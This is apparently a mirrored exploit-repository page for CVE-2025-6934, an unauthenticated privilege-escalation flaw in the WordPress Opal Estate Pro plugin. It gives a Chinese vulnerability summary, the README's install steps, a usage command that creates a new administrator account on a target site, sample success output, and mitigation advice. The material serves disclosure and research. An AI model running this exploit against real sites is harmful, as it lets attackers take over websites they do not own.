关联漏洞
标题:
WordPress plugin Opal Estate Pro 安全漏洞
(CVE-2025-6934)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Opal Estate Pro 1.7.5及之前版本存在安全漏洞,该漏洞源于on_regiser_user函数缺少角色限制,可能导致权限提升。
描述
CVE-2025-6934 is a critical vulnerability in the WordPress Opal Estate Pro plugin (<= 1.7.5) that allows unauthenticated attackers to create new administrator accounts through the plugin’s insecure AJAX registration process.
介绍
# CVE-2025-6934 – WordPress Opal Estate Pro Exploit
<p align="center">
<img src="https://s.w.org/about/images/logos/wordpress-logo-notext-rgb.png" alt="WordPress Logo" width="200" height="200">
</p>
📖 Description
This repository contains a **Proof of Concept (PoC) exploit** for **CVE-2025-6934**,
a critical vulnerability in **WordPress Plugin: Opal Estate Pro <= 1.7.5**, allowing **unauthenticated administrator account creation**.
⚠️ **Disclaimer**: This tool is provided for **educational and security research purposes only**.
The author is **not responsible** for any misuse or damage caused.
---
## 🚀 Features
- Automatic detection of plugin version from `readme.txt`
- Nonce extraction for registration
- Exploits vulnerable AJAX endpoint
- Creates a new **administrator account**
---
## 🔧 Installation
Clone the repo and install dependencies:
```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
````
**requirements.txt**
```
requests
beautifulsoup4
colorama
```
---
## ▶️ Usage
Run the script with your target:
```bash
python3 CVE-2025-6934.py -u http://target.com/ -mail newadmin@mail.com -password MySecurePass123 -user newadmin
```
✅ Example Output:
```
[✔] Exploit Successful!
Username : newadmin
Email : newadmin@mail.com
Password : MySecurePass123
Role : administrator
```
---
## 📸 Screenshot

---
## 🛡️ Mitigation
* Update to the **latest version** of the plugin
* Or disable the vulnerable plugin immediately
* Monitor WordPress logs for unauthorized account creation
---
## 👤 Author
**Gaurav Bhattacharjee** (0xgh057r3c0n)
---
## 📜 License
This project is licensed under the **MIT License** – see the [LICENSE](LICENSE) file for details.
文件快照
[4.0K] /data/pocs/0611c08c68a78e093ee4e71990b2890eee8cd75f
├── [5.6K] CVE-2025-6934.py
├── [2.5K] CVE-2025-6934.yaml
├── [1.1K] LICENSE
├── [1.8K] README.md
├── [ 33] requirements.txt
└── [1.2M] screenshot.png
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。